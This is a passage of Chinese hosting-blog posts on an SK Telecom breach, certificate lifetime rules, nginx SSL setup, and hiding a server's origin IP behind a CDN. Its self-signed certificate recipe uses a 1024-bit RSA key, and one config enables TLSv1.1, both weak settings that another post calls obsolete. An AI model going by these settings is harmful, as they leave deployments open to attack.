官方应对措施 立即行动:删除恶意软件代码,隔离受感染设备; 系统升级:全面检查系统漏洞,加强非法SIM卡变更、异常登录拦截; 用户补偿:为高风险客户提供免费SIM卡保护服务(需主动申请); 监管报告:已向韩国通信委员会等主管部门提交事件报告。 3️⃣ 当前风险提示 官方称尚未发现泄露信息被滥用案例,但建议用户:▪️ 开启短信/通话异常监控;▪️ 避免通过短信链接输入个人信息;▪️ 定期更换重要账户密码。 用户高频问题解答(FAQ) Q:中国用户是否受影响?A:SK Telecom主要服务韩国本土,但若持有其国际漫游SIM卡需警惕风险。 Q:如何申请免费SIM卡保护服务?A:联系SK Telecom客服(韩国境内拨打100)或通过官网提交请求。 Q:SIM卡泄露可能导致哪些风险?A:短信劫持、二次号诈骗、账户盗用等,建议绑定双重认证。 影响范围与官方声明 涉及用户:韩国境内SK Telecom用户(个人及企业); 官方承诺:▪️ 全额承担客户因泄露导致的直接损失;▪️ 未来将投入更多资源升级安全系统;▪️ 实时更新调查进展(可通过官网或APP查看)。 用户自查与防范建议 1️⃣ 立即操作 检查短信/通话记录是否有可疑活动; 联系SK Telecom确认自身是否在受影响范围。2️⃣ 长期防护 启用SIM卡PIN码锁定功能; 银行、社交账号绑定双重身份验证(如谷歌验证器)。 #### Soul合伙人设局抹黑Uki恶意竞争被批捕 多家媒体报道,Soul的运营合伙人已被批捕,原因是“熟悉的骚操作”——涉嫌故意在竞争对手的APP上散布有害违规信息,“设局”进行恶意举报。犯罪嫌疑人李某、范某因涉嫌损害商业信誉、商品声誉罪被普陀区人民检察院批准逮捕。 了解到,被Soul合伙人设局遭攻击的软件是一款与“Soul”功能类似名为“Uki”的陌生社交APP,而Soul合伙人为了打击竞争对手“Uki”,指使手下在Uki平台上注册账号,发布了违规信息和图片,并在截图后向有关部门举报,搞得“Uki”被下架处理三个月,被整惨了! 而随后发现不对的“Uki”也向公安报案,Soul一位负责人因为恶意被批捕,目前Uki也重新在应用商店重新上线。 商业竞争残酷与现实可以理解,竞争也是正常的,但是凡事都有个度。但恶意抹黑下绊子触犯到法律,可能就会赔了夫人又折兵了,Soul整出这一出,真的是自毁长城,不仅路人缘败光了,还变相给uki打了波广告! #### Spring现高危安全漏洞 3月30日 消息:据外网消息,目前主流的 Java EE轻量级开源框架Spring被曝JNDI注入漏洞,该CVE编号为0day,漏洞评级为高危。 据了解,受漏洞影响条件包括:1、JDK 版本号 9 及以上的;2、使用了Spring 框架或衍生框架。建议开发者进行JDK版本号(注:如果版本号小于等于8,则不受漏洞影响)和Spring框架使用情况进行排查。 业内人士分析,本次Sprintboot漏洞严重程度不亚于之前阿帕奇(Apache)Log4j2 漏洞。 目前,spring官方暂未发布官方补丁。建议受影响的用户暂时采用WAF防护或临时修复措施进行防护。之后应及时关注官方补丁发布情况,按官方补丁修复漏洞。 #### SSL / TLS 证书最长有效期又缩短了,这次45天! 4 月 14 日消息,经过一系列讨论,CA / B论坛服务器证书工作组投票通过 SC-081v3 提案,最终决定逐步缩短公开信任 TLS 证书有效期及数据重用周期。提案规定证书有效期从 398 天降至 47 天(比 45 天略有延长),SAN 数据重用周期缩短至 10 天。提案满足 CA / B 论坛章程要求,进入知识产权审查阶段。 SSL / TLS 证书是一种用于网站的安全协议,苹果此前向 CA / B 论坛 (负责管理 SSL / TLS 证书的行业组织) 提议将所有证书有效期缩短至 45 天。 投票结果: 证书颁发机构(CA):赞成票 25、反对票 0、弃权票 5 CA 赞成票 25: Amazon, Asseco Data Systems SA (Certum), Buypass AS, Certigna (DHIMYOTIS), Certinomis, DigiCert, Disig, D-TRUST, eMudhra, Fastly, GlobalSign, GoDaddy, HARICA, iTrusChina, Izenpe, NAVER Cloud Trust Services, OISTE Foundation, Sectigo, SHECA, SSL.com, SwissSign, Telia Company, TrustAsia, VikingCloud, Visa CA 弃权票 5:Entrust, IdenTrust, Japan Registry Services, SECOM Trust Systems, TWCA 证书消费者:赞成票 4(苹果、谷歌、微软、Mozilla)、反对票 0、弃权票 0 SSL / TLS 证书是一个数字对象,它允许系统验证身份,然后使用安全套接字层 / 传输层安全性(SSL / TLS)协议建立到另一个系统的加密网络连接。证书在名为公有密钥基础设施(PKI)的加密系统中使用。通过 PKI,在双方都信任同一个第三方(称为证书颁发机构)的情况下,一方可以确认使用证书的另一方的身份。SSL / TLS 证书可用作数字身份证来保护网络通信的安全,确认网站在互联网上的身份以及资源在私有网络上的身份。 SSL / TLS 证书在网站用户之间建立信任。企业在 Web 服务器上安装 SSL / TLS 证书,以创建受 SSL / TLS 保护的网站。受 SSL / TLS 保护的网页的特征如下: Web 浏览器中的挂锁图标和绿色地址栏 浏览器网站地址中的 https 前缀 有效的 SSL / TLS 证书。您可以通过单击并展开 URL 地址栏中的挂锁图标来检查 SSL / TLS 证书是否有效 建立加密连接后,只有客户端和 Web 服务器才能看到发送的数据 提案称,证书是现实状态在某一时刻的表示。也就是说,在证书签发时,其中认证的所有数据都是正确的,并且该认证所遵循的过程在该时刻被准确记录(存在一些例外)。从签发那一刻起,经过的时间越长,证书中代表的数据与现实相偏离的可能性就越大。因此,缩短证书有效期限和数据重用期限可以提高证书的平均净可靠性。 要求更频繁地验证用于颁发证书的信息,并降低证书的最大有效期,可以减少不当验证的风险、不当验证持续的范围以及误发证书对生态系统及其依赖方的负面影响的机会。 这项有效期减少措施建议从 2026 年 3 月开始,到 2029 年 3 月结束: 2026 年 03 月 14 日前:证书有效期最长为 398 天 2027 年 03 月 14 日前:证书有效期最长缩短至 200 天 2029 年 03 月 14 日前:证书有效期最长缩短至 100 天 2029 年 03 月 15 日后:证书有效期最长缩短至 47 天 #### SSL HTTPS可以改端口吗?具体如何操作 通常,端口用于使计算机了解通过类似的网络连接从计算机接收或发送到计算机的数据类型。每个端口都分配有不同的功能和端口号,如端口 80、443、21、25 等。端口是一个虚拟编号地址,用作与各种传输层协议通信的端点。SSL默认使用的就是443端口,那么SSL可以改端口吗? SSL是可以改端口的,不过小编建议大家不是特殊情况就不要随意更改端口号。HTTPS(安全超文本传输​​协议)是一个安全的HTTP版本,也就是使用了SSL,所有流量都通过 443的强加密绑定。SSL端口443在RFC 1700中正式发布,并由“Kipp EB Hickman”征集。端口80和端口443之间的主要区别在于强大的安全性。端口443允许通过安全网络传输数据,而端口80允许以纯文本形式传输数据。如果他尝试访问非HTTPS网页,用户将收到不安全警告,端口 443 在数据传输发生之前对网络数据包进行加密。 如果真的必须修改端口号的话可以参考以下方法: 以nginx为例(因每个服务器场景不同,自定义端口的方法有所区别)需要修改vhost server段,打个比方需要将端口号设置为4,63,代码如下: listen 463 ssl http2; 重启nginx以后,我们就能通过 https://your-domain:463/ 的方式访问 可以看出修改SSL端口号比较简单,但是后面访问就比较麻烦了,还需要在域名后面加上:端口号,所以非必要不推荐大家去修改端口号。 #### SSL握手失败 百度云加速无法和源站建立ssl连接原因及解决办法 最近有一百度云加速客户遇到: SSL握手失败 百度云加速无法和源站建立ssl连接 Error 525 的状态情况。 经查识是客户开启了HTTPS加速-全程加密状态,而全程加密是需要源站服务器HTTPS也是可以正常访问的。 主机吧强制回源后发现客户源服务器的HTTPS并没有正常部署SSL证书,导致百度SSL握手失败,所以就有了以上的显示。 解决问题只需要恢复源站服务器的SSL证书正常部署就可以了。 如果您的源站没有SSL或者无法部署,可以启用半程加密,在HTTPS加密-选半程加密即可。开启后等12小时左右即可同步。 #### SSL握手失败 百度云加速无法和源站建立ssl连接 最近有一客户使用百度云加速后提示: 使用百度云加速后提示:SSL握手失败 百度云加速无法和源站建立ssl连接 Error 525 -- Event ID: 5b388fadfb353a92 提示该问题的原因是没有正确部署SSL证书,我们先进入域名管理-证书管理-证书列表,上传部署SSL证书 如果上传部署后还不正常的,那可能是你源服务器并没有正常部署SSL证书,需要进入服务器里部署好SSL证书才可以。   #### SSL浏览器绿色图标要变!谷歌 Chrome 浏览器 9 月将启用新的安全图标 谷歌计划在今年 9 月份对 Chrome 浏览器进行大规模修葺,地址栏中用于显示 HTTPS 链接的绿色“小锁”图标将彻底退出历史舞台。 官网解释如下: 在 HTTPS 尚未完全普及的时候,“小锁”图标能让用户更直观地了解到 HTTPS 提供的额外保护。 时至今日,HTTPS 已经普及,因此 Chrome 浏览器也要做出相应的改进。 我们虽然尽了最大努力,但我们在 2021 年的研究表明,只有 11% 的研究参与者正确理解了“小锁”图标的确切含义。 几乎所有钓鱼网站都使用 HTTPS,如果继续显示“小锁”图标,可能会产生混淆和误解。 包括 FBI 在内的许多组织都发布了明确的指南,“小锁”图标并不是网站安全的标志。 谷歌计划在今年 9 月使用“tune”图标来替代“小锁”图标。这种新设计意在成为一个“中性指标”,同时也暗示“安全应该是 Chrome 中的默认状态”。 谷歌计划在 2023 年 9 月上旬发布的 Chrome 117 版本中,在使用 Material You 语言进行重新设计之外,正式改用全新的“tune”图标。 感兴趣的站长,也可以在 Chrome 浏览器中访问 chrome://flags#chrome-refresh-2023,启用之后会看到新的“tune”图标。 #### SSL证书 国产根 “国产根SSL证书”指的是由中国本土的证书颁发机构(CA)签发,并且其根证书本身也由中国机构自主掌控的SSL证书。它的核心特征是“根证书由中国机构持有并运营”,而非依赖国外CA的根证书。 ✅ 关键理解点 项目国产根SSL证书非国产根SSL证书根证书归属中国CA机构自主签发并控制国外CA机构(如DigiCert、Sectigo)算法支持通常支持国密算法(SM2/SM3/SM4)多使用RSA/ECC等国际算法信任链根证书内置在中国操作系统/浏览器中根证书内置于全球主流浏览器合规性符合中国《密码法》《网络安全法》要求不一定满足国密合规数据控制审核、签发、吊销全程国内完成,数据不出境需将审核数据提交至国外CA兼容性对老旧浏览器或国际浏览器兼容性有限全球浏览器普遍信任 ✅ 中国目前真正拥有“国产根”的SSL证书机构 截至目前,中国大陆唯一被广泛认可为拥有完全自主国产根的SSL证书机构是: CFCA(中国金融认证中心) ⚠️ 注意:市面上很多所谓“国产SSL证书”只是国内CA机构使用国外根证书(如DigiCert、Sectigo)签发,不属于国产根SSL证书,只能算“国产代理”或“国产中间证书”。 ✅ 如何识别是否为国产根SSL证书? 打开网站 → 点击地址栏小锁图标 → 查看证书 → 查看“证书路径”; 查看根证书颁发者是否为中国机构(如 CFCA Root CA); 查看根证书主题字段是否包含 C=CN(代表国家为中国)。 ✅ 总结一句话 国产根SSL证书 = 由中国CA机构签发 + 根证书由中国掌控 + 支持国密算法 + 数据不出境 + 满足国家合规要求。 #### SSL证书中DV、OV和EV证书有哪些区别 关于https证书 https协议需要到ca申请证书,一般免费证书很少,需要交费。 http是超文本传输协议,信息是明文传输,https 则是具有安全性的ssl加密传输协议。 http和https使用的是完全不同的连接方式,用的端口也不一样,前者是80,后者是443。 http的连接很简单,是无状态的;HTTPS协议是由SSL+HTTP协议构建的可进行加密传输、身份认证的网络协议,比http协议安全。 目前大部分网站都在忘https上转,Chrome也将https作为浏览器的默认连接,如果网站没采用https的话,就会出现!的标识。 苹果宣布了一个最后期限:到2017年1月1日 App Store中的所有应用都必须启用 App Transport Security安全功能。App Transport Security(ATS)是苹果在iOS 9中引入的一项隐私保护功能,屏蔽明文HTTP资源加载,连接必须经过更安全的HTTPS。苹果目前允许开发者暂时关闭ATS,可以继续使用HTTP连接,但到年底所有官方商店的应用都必须强制性使用ATS。 所以,推行https是整个互联网行业的趋势。 证书 目前主流的SSL证书主要分为DV SSL 、 OV SSL 、EV SSL。 DV SSL DV SSL证书是只验证网站域名所有权的简易型(Class 1级)SSL证书,可10分钟快速颁发,能起到加密传输的作用,但无法向用户证明网站的真实身份。 目前市面上的免费证书都是这个类型的,只是提供了对数据的加密,但是对提供证书的个人和机构的身份不做验证。 OV SSL OV SSL,提供加密功能,对申请者做严格的身份审核验证,提供可信身份证明。 和DV SSL的区别在于,OV SSL 提供了对个人或者机构的审核,能确认对方的身份,安全性更高。 所以这部分的证书申请是收费的~ EV SSL 超安=EV=最安全、最严格 超安EV SSL证书遵循全球统一的严格身份验证标准,是目前业界安全级别最高的顶级 (Class 4级)SSL证书。 金融证券、银行、第三方支付、网上商城等,重点强调网站安全、企业可信形象的网站,涉及交易支付、客户隐私信息和账号密码的传输。 这部分的验证要求最高,申请费用也是最贵的。 常见的颁发证书机构 赛门铁克(Symantec)是 SSL/TLS 证书的领先提供商 中国金融认证中心(CFCA)全球信任SSL证书 GeoTrust是全球第二大数字证书颁发机构 #### SSL证书中的.key.cer.crt格式分别是什么文件 最近从百度SSL那下载的SSL证书文件有三个格式的文件,分别是.key 、.cer、.crt格式的文件,这三个代表什么呢? 主机吧了解百度了下,.key是SSL证书私钥。 而.cer和.crt是证书链,其中,.cer是服务器证书,.crt是中间证书,一般我们上传的时候都是合着上传写入的,比如百度云加速上传SSL证书的时候,在证书输入框输入 .cer的文本,再回车输入.crt的文件,即可完成证书链。 #### SSL证书也不安全,俄罗斯SSL证书要被注销 由于众所周知原因,俄罗斯目前几乎被西方国家所有公司断供,包括互联网公司,之前一家美国的域名注册公司表示暂停俄罗斯注册域名,并清退已有俄罗斯客户,现在连HTTPS证书也不安全了。 著名SSL认证机构Sectigo拒绝为俄罗斯域名颁发HTTPS证书,甚至还吊销了已经办理的证书。 Sectigo是世界上最大的 CA 之一,拥有超过 700,000 个客户,很多站长其实并不了解,国内很多便宜的SSL证书都是出自Sectigo,很多国内代理商负责销售,事实上国内几乎没有国产的SSL认证机构,以西部数码为例销售的全部来自外国品牌。 当然,也不是说国内没有纯国产的SSL证书,但是国产的SSL证书对于中小站长来说,几乎没有普及,一但国内也像俄罗斯一样被制裁的话,那么网站真的一夜回到解放前了。 要知道如果网站SSL证书无法使用,你的浏览器都无法进入,比如谷歌浏览器就强制部署SSL,比如国内的小程序应用都必须部署SSL,还有苹果手机,也是强制SSL,否则无法访问网站。 #### SSL证书会暴露服务器真实IP吗(SSL证书暴露IP如何解决) 我们通常会用cdn套到服务器ip上,来为网站或者后端程序做加速、防御。可是nginx在设计上有个小缺陷,会因为ssl证书泄露网站的原IP 原理 用Nginx部署网站,在默认或不正确的配置下,网站开启ssl,直接访问ip的443端口,即ip:443,Nginx会返回默认一个站点的ssl证书,间接的能让别人扫到这个ip对应的域名。 原理就是对ip的443端口发送clienthello,对方回复的 serverhello中有ssl证书,ssl证书里的common name 有域名信息。这样就知道了解析这个ip的域名。所以更准确的说是IP的443端口可能会暴露了域名。 动作再大一点,批量扫描机房的ip段,把对应的域名-ip 的多值映射表统计起来。以后想查某个域名对应的源站 ip 查这个表就够了,这是黑产喜欢干的事。 同时也是很多站点,明明套上了cdn,依然能被打到源站IP的原因。 解决办法 禁止直接访问IP # 禁止IP直接访问网站 server { listen 80 default_server; listen [::]:80 default_server; server_name _; return 444; } 自签IP的SSL证书,返回444 自签证书的目的不是为了访问,而是避开Nginx的这个缺陷。生成自签的IP SSL证书可以用开源的Mkcert(https://myssl.com/create_test_cert.html)工具。Mkcert使用起来稍微麻烦,或者用一个测试证书的在线网页工具:https://myssl.com/create_test_cert.html在填写域名的位置填上IP地址,点生成按钮会自动测试证书展示在下面,各自保存为.pem文件和.key文件。然后在nginx里配置上“return 444”,类似配置大概: { listen 80 ; listen 443 ssl http2 default_server; server_name ip; #HTTP_TO_HTTPS_END ssl_certificate xxxx.pem; ssl_certificate_key xxxx.pem; ssl_protocols TLSv1.1 TLSv1.2 TLSv1.3; return 444; } 购买合法IP站点的SSL证书 花点小钱买个合法的IP SSL证书配置到nginx里,IP证书一般一二百左右。 加钱,世界触手可及。 仅允许指定cdn的IP访问 Nginx仅允许指定cdn的IP访问,避免放到公网上被任何人扫。以腾讯云CDN段为例,在Nginx网站配置文件里,添加如下: location / { allow 58.250.143.0/24; allow 58.251.121.0/24; allow 59.36.120.0/24; allow 61.151.163.0/24; allow 101.227.163.0/24; allow 111.161.109.0/24; allow 116.128.128.0/24; allow 123.151.76.0/24; allow 125.39.46.0/24; allow 140.207.120.0/24; allow 180.163.22.0/24; allow 183.3.254.0/24; allow 223.166.151.0/24; deny all; } 查一下使用的CDN商家的文档,如果有新的IP段更新,也加到里面。 #### SSL证书到期如何在百度云加速更新 最近有一客户因为 SSL证书到期了,所以要更换新的,要怎么处理呢? 1.首先我们得确认源服务器部署SSL证书正常了,然后我们在百度云加速里面,进入域名管理,左边的证书管理 2.点击进入证书列表: 3.上传证书 4.把需要更新的SSL证书的nginx包里的相应的文件复制进去即可 5.确定上传更新后的SSL证书后,我们再把之前过期的删了。 到此,就完成了SSL证书更新了,希望可以帮助各位同学,有什么不懂的都可以留言主机吧。 #### SSL证书安装后地址栏安全图标异常原因解决办法 安装SSL证书后,由于网站内容原因,可能出现橙色三角形灰色锁、灰色三角形绿色锁等图标,或者提示连接不安全。 ① 带橙色警告三角形的灰色锁: 说明浏览器已经安装SSL证书,访客与该网站的连接已加密,攻击者很难从该网站盗取您的隐私数据。但浏览器在该网页上检测到混合内容,包括网页中内嵌的第三方图片、视频或广告等。 您需要查看网站源代码,将外部http链接修改为https链接。 ② 带灰色警告三角形的绿色锁: 您的网页是安全的,浏览器阻止了网页的不安全内容。如果您信任被阻止的内容,可点击地址栏中的绿色小锁图标,并暂时解除对网站的不安全内容的拦截即可。 #### SSL证书新要求:最小密钥长度将于6月增强至3072位 近日,CA/B论坛对代码签名证书提出新要求:从2021年6月1日起,代码签名证书的最小密钥长度将从2048位增强至3072位。为了遵从新规,Digicert,Entrust等国际CA纷纷调整策略以应对密钥长度的变化带来的影响。 为了提高证书安全性,提前为未来先进技术做好准备,作为全球网络安全行业国际组织,CA/B论坛发布了如下通知:从2021年6月1日起,代码签名证书的最小密钥长度将从2048位增强至3072位。 代码签名证书(Code Signing Certificate)是软件开发商的理想解决方案。有了代码签名证书他们就可以对自己的产品(如应用程序、驱动程序、可执行文件或者其他程序)进行数字签名,保证软件代码和内容的安全性。签名后的软件可以标识开发者的真实身份,如果在传输过程中被第三方修改,将自动提醒最终用户以免被欺骗。 虽然数字签名可以在很长一段时间内保持有效(代码签名有效期是3年)。但与此同时,技术的进步容易使这些相对较老的、较弱的密钥受到暴力破解。因此,将来验证这些签名的一种方法是提高代码签名证书的最小密钥长度。 那么,密钥长度到底是什么?代码签名证书的密钥长度发生了什么变化?最重要的是,这将对代码签名证书的客户有什么影响? 什么是密钥长度 密钥长度是证书关联密钥对中的位数,用于签名和加密。密钥长度通常设置了一个加密算法的安全性上限,密钥长度越长,意味着更强的数字签名,也就更安全。理论上说,任何一种加密算法都可能被超强计算机通过暴力破解,但是在密钥长度越长的情况下,暴力破解的时间也会越长。所以理想情况下,在相当长一段时间内通过暴力破解密钥不是那么容易的。 但是随着科学技术的进步,攻击者在无人知晓的情况下恶意篡改应用程序也只是时间问题。为了确保当前的数字签名能在未来几年内可继续使用,提高密钥长度是一个很好的办法。 代码签名证书密钥长度发生了什么变化 在八年前,证书的密钥长度被要求从1024位调整至2048位。所以,现在代码签名证书的最小密钥长度是2048位,并且是非常安全的。但是,随着时间的推移,目前的安全加密签名在未来可能会受到威胁攻击,鉴于此问题,美国国家标准与技术协会(NIST)发布了NIST SP 800-57密钥管理建议:基于安全性考虑,建议在2030年之后不再使用RSA算法2048位密钥。 专注于CA和浏览器的安全技术与标准的讨论与制定的CA/B论坛在分析了NIST的建议之后,投票决定从2021年6月1日起,代码签名证书最小密钥长度为RSA3072位。 密钥长度的变化会产生什么影响 2021年6月1日之后颁发的代码证书将自动链接到3072位的根证书,因此您不用购买其他产品或重新定向3072位信任链。 在2021年6月1日之前签发的2048位代码签名证书,仍然可以有效使用。如果是在6月1日之后重签或续费代码证书,需要在生成CSR时选择RSA3072加密位数。但即使是在6月1日之前签发的2048位证书,为了遵循行业标准、提高安全性,锐成信息还是建议您尽快重签切换到3072位代码签名证书。 如何查看证书密钥长度 如果不知道自己现有证书的密钥长度,可通过以下几个简单的操作步骤就可以查看。例如,在Windows中找到您的证书文件,右键单击证书,选择【属性】,点击证书的【详细信息】选项卡,在【公钥】里即可查看到密钥长度,如下图: Windows 10中的代码签名证书的属性窗口 如果您的代码签名证书是2048位,建议您在6月1日之后重签切换到3072位代码签名证书。 为了遵从CA/B论坛对代码签名证书的新规要求,Digicert,Entrust等国际CA纷纷调整策略。Digicert宣布2021年5月27日之后签发的代码签名证书必须支持RSA算法3072位或更强的密钥长度。2021年上半年,Entrust已发布RSA算法4096位的根证书,新签的代码签名证书密钥长度将为RSA 3072位或4096位。如果Entrust代码签名需带有时间戳,那么就需要选择4096位的RSA密钥。具体变更详情可前往各自官方网站查询。 #### SSL证书暴露源站IP怎么办? 检查 我们前往站点 Censys 检查一下自己的ip是不是被他扫了出来? 可以看到,我的站点被扫到了很多。 解决方案 解决这个问题的方法非常的无脑简单,那就是给自己的服务器IP签发一个自签证书,然后设置为默认站点即可。 自签证书的前提是你的服务器安装有Openssl等类似软件。 我们在服务器端输入 openssl version 复制 如果出现上图中的版本号那么您服务代表安装成功。 否则输入以下指令安装openssl apt-get install openssl 复制 然后打开终端,输入下列命令 通过openssl生成私钥 openssl genrsa -out server.key 1024 复制 根据私钥生成证书申请文件csr openssl req -new -key server.key -out server.csr 复制 这里根据命令行向导来进行信息输入: Common Name可以输入:*.yourdomain.com,这种方式生成通配符域名证书 使用私钥对证书申请进行签名从而生成证书 openssl x509 -req -in server.csr -out server.crt -signkey server.key -days 3650 复制 这样就生成了有效期为:10年的证书文件,对于自己内网服务使用足够。 设为默认站点 各个系统的设为默认站点都不一样,大家把证书部署完毕后设为以下就行。 我这边只演示宝塔面板下的默认站点设置。 至此,ssl证书泄露源站ip的风险也解除了。 #### SSL证书有效期重大调整:2026年2月起,最长有效期缩短至199天 核心通知:为提升安全,SSL/TLS证书生命周期将再次缩短 根据全球证书颁发机构行业自律组织 CA/B论坛 最新发布的 《SC-081v3》 规定,为持续提升互联网通信安全,公有SSL/TLS证书的最长有效期将进一步缩短。作为全球领先的数字证书提供商,DigiCert 已正式宣布将遵循此新规。 核心变更如下: 自2026年2月17日起,所有新签发的公有SSL证书(包括DV、OV、EV类型)最长有效期将从当前的397天缩短至199天。 同时,域名验证(Domain Validation)数据的重复使用有效期也将从397天同步缩短至199天。 此举旨在通过更频繁的证书轮换,促使网站所有者更快地采用更新的加密标准、淘汰旧的不安全协议,并增强对潜在私钥泄露等安全事件的响应能力,是行业提升整体网络安全态势的重要举措。 变更时间线与详细解读 为确保平稳过渡,DigiCert设定了明确的时间节点。请您务必根据自身证书的续期和采购计划,提前做好安排。 一、SSL证书有效期调整(199天上限) 时间节点 (UTC)关键行动与影响2026年2月3日 18:00停止受理长有效期申请:此后提交的新订单,将无法申请有效期超过199天的证书。2026年2月17日 18:00全面执行新规:此后所有签发的公有SSL证书,其有效期均不会超过199天。 重要说明: 现有证书不受影响:在此截止时间点之前已签发的、有效期超过199天的证书,可完全信任并正常使用至其自然到期日。 多年期订单处理:对于在截止日前购买的2年或3年多年期证书套餐,其订单服务期不变,但每次续期或重新颁发证书时,单张证书的有效期将遵循新的199天上限。 二、域名验证数据重复使用期调整(199天上限) 时间节点 (UTC)关键行动与影响2026年2月17日 18:00验证有效期缩短:此后完成的域名验证,其验证结果(用于签发OV、EV证书)最长可复用199天。 重要说明: 影响范围:主要影响需要组织验证(OV)和扩展验证(EV)的SSL证书,以及部分邮件安全证书。标准域名验证(DV)证书通常采用自动化验证,不受此复用期影响。 历史验证处理:在2025年8月3日之前完成的验证,将于2026年2月17日统一失效,需要重新验证。 【主机帮】给站长与运维工程师的核心建议 面对证书生命周期的再次缩短,手动管理证书将变得难以维系。我们强烈建议您立即采取以下措施,化被动为主动,将合规压力转化为提升安全运维自动化的契机。 1. 立即盘点与规划(现在开始) 资产清单:立即梳理您所有域名的SSL证书信息,重点关注在2026年2月至8月期间到期的证书。 采购规划:若您的业务确需较长周期保障,请务必在 2026年2月3日18:00 UTC之前 提交有效期超过199天的新证书申请,并确保在2月17日前完成签发。 2. 全面推进证书管理自动化(未来2个月的核心任务) 采用ACME协议:为所有支持的通配符和单域名证书,部署基于 ACME协议 的自动化工具(如Certbot、acme.sh)。 启用自动化管理平台:对于拥有大量证书的企业,强烈建议采用专业的证书生命周期管理(CLM)解决方案(例如锐成信息提供的锐安信CLM-SSL系统),实现从申请、部署、监控到续期的全流程自动化,彻底避免因遗忘续期导致的业务中断。 3. 调整运维监控策略 缩短告警阈值:将证书过期告警时间从传统的“提前30天”调整为 “提前60天” ,为自动化流程或人工干预留出充足缓冲时间。 增强监控覆盖:确保监控系统能覆盖所有子域名和服务的证书状态,而不仅仅是主域名。 深度思考:为何行业持续缩短证书有效期? 这并非第一次缩短有效期(从过去的数年,到2年,再到398天,现在到199天),其背后的安全逻辑清晰且坚定: 限制漏洞暴露时间:如果证书私钥不幸泄露,攻击者冒用身份的时间窗口将被缩短。 强制安全技术升级:更频繁的续期推动管理员更快地弃用过时的加密算法(如SHA-1、RSA-1024),采用更安全的算法(如ECDSA)。 提升生态响应敏捷性:在发现CA或广泛使用的加密库存在严重漏洞时,能够通过快速更换证书来降低整体风险。 结论与行动号召 SSL/TLS证书有效期缩短至199天,是行业向更敏捷、更安全的基础设施演进的重要一步。对于运维团队而言,这既是一个明确的合规截止日期,更是一次推动基础设施管理向自动化、精细化转型的战略机遇。 被动应对将导致后续工作疲于奔命,主动布局则能借此提升整体安全运维水平。我们建议您立即启动评估与规划,并优先部署自动化管理工具。 作为您可信赖的安全合作伙伴,锐成信息将持续提供符合最新行业标准的数字证书产品与自动化管理解决方案,协助您平稳、高效地完成此次过渡。 (主机帮将持续关注行业合规动态,为您提供前瞻性的技术解读与实战解决方案。安全之路,我们与您同行。) #### SSL证书过期后将无法正常使用百度云加速免费版 近日,有位站长反馈主机吧,自己用的百度云加速免费版SSL证书过期了,但找不到重新部署SSL的功能,要怎么办? 这里主机吧说明下,百度云加速免费版老早就取消了,目前能用的也都是之前旧接入的用户,而SSL证书一但到期,将无法更换新的证书,也就是无法正常使用了。 想要继续使用百度云加速只能花钱购买收费版的,而目前百度云加的套餐价络涨了,专业版一个月高达399元,主机吧这边代理价也要299元一个月。 目前百度云加速已经陆续把CDN节点迁移至百度智能云上了,节点比现在多得多,高达上百个,相信以后会稳定很多。 #### SSL证书过期已经严重影响网站运营 SSL证书过期已经成为网站稳定性的重要难题 在当今数字化时代,SSL证书对于网站的重要性不言而喻。它不仅能够加密用户数据,保护隐私信息,还能增强用户对网站的信任。然而,SSL证书的有效期通常只有3个月到1年,这意味着网站管理员需要定期更新证书以保持网站的安全性。遗憾的是,SSL证书过期已经成为网站稳定性的一个重要难题,它不仅会导致网站无法通过HTTPS协议访问,还可能引发一系列负面影响。 SSL部署的困难 SSL证书的部署本身就是一个技术挑战。不同的Web服务器环境(如Apache、Nginx、IIS等)有不同的配置要求。管理员需要准确无误地配置证书文件、私钥和中间证书,并且还要确保服务器时间设置准确,以避免证书验证失败。此外,SSL证书的安装过程可能会因为服务器环境的复杂性而变得更加困难,有时甚至需要专业的技术支持来完成部署。 SSL证书过期频繁 由于SSL证书的有效期有限,网站管理员需要频繁地关注证书的有效期,并及时进行续期。这不仅增加了管理工作的负担,也增加了因遗忘续期而导致证书过期的风险。证书颁发机构(CA)通常会在证书到期前发送提醒,但这些提醒有时可能会被忽视或错过。 网站经常出现打不开的情况 当SSL证书过期后,浏览器会显示安全警告,阻止用户继续访问网站。这会导致网站的访问量急剧下降,因为用户通常不会信任一个被标记为不安全的网站。此外,搜索引擎优化(SEO)排名也可能因为证书过期而受到影响,进一步降低网站的可见度和流量。在极端情况下,如果没有有效的SSL证书,网站与用户之间传输的数据将不再加密,这为中间人攻击提供了机会,可能导致敏感信息的泄露。 解决方案 为了解决SSL证书过期的问题,网站管理员可以采取以下措施: 及时续期:一旦发现SSL证书即将过期,应立即联系证书提供商进行续期。 设置提醒:使用日历提醒或证书管理工具,确保在证书到期前得到通知并处理。 自动续订:考虑配置SSL证书的自动续订功能,以避免未来再次出现证书过期的问题。 定期检查:定期检查SSL证书的有效期,确保证书始终处于有效状态。 备份证书:定期备份SSL证书,以便在证书丢失或损坏时能够快速恢复。 总之,SSL证书过期是一个需要网站管理员持续关注和积极应对的问题。通过采取适当的预防措施和解决方案,可以最大限度地减少证书过期对网站稳定性的影响。 #### SSL证书(SM2) 中SM2是什么意思 SM2 指的是一种中国国家密码管理局发布的椭圆曲线公钥密码算法,全称是 SM2椭圆曲线公钥密码算法,属于国密算法体系的一部分。 ✅ SM2 算法的核心含义与作用: 项目说明算法类型非对称加密算法(公钥密码体制)标准来源中国国家标准 GB/T 32918-2016技术基础椭圆曲线密码学(ECC)主要用途数字签名、密钥交换、数据加密密钥长度常用为256位,安全性 ≈ RSA 3072位 优势高安全性、低延迟、短密钥、抗量子攻击潜力 ✅ 在 SSL 证书中的具体作用: 身份认证:使用 SM2 私钥对服务器身份进行数字签名,客户端用对应公钥验证。 密钥协商:通过 SM2 密钥交换协议(类似 ECDH)在握手阶段安全协商对称密钥。 数据加密:SM2 不直接加密大量数据,而是用于加密对称密钥(如 SM4),再由 SM4 加密传输数据。 ✅ 为什么证书中标明“SM2”? 标注为 “SM2” 表示该 SSL 证书使用的是 国产密码算法体系,符合中国网络安全合规要求,适用于政府、金融、央企等对**国密合规(密评、密改)**有明确要求的场景。 ✅ 小结一句话: SM2 是中国自主研发的高安全性椭圆曲线加密算法,在 SSL 证书中用于替代 RSA,实现身份认证和密钥交换,满足国密合规要求。 #### Steam 社区故障数小时 6 月 2 日消息,今日下午 Steam 出现大规模故障,Steam 社区无法访问已达数小时,影响包括游戏社区、创意工坊、个人主页、第三方登陆在内的功能。 服务监测网站 Downdetector 显示自中午 12 点左右开始,大量用户开始报告 Steam 服务出现故障。 #### Steam、拳头等多家网络服务集体宕机 疑遭大规模DDoS攻击 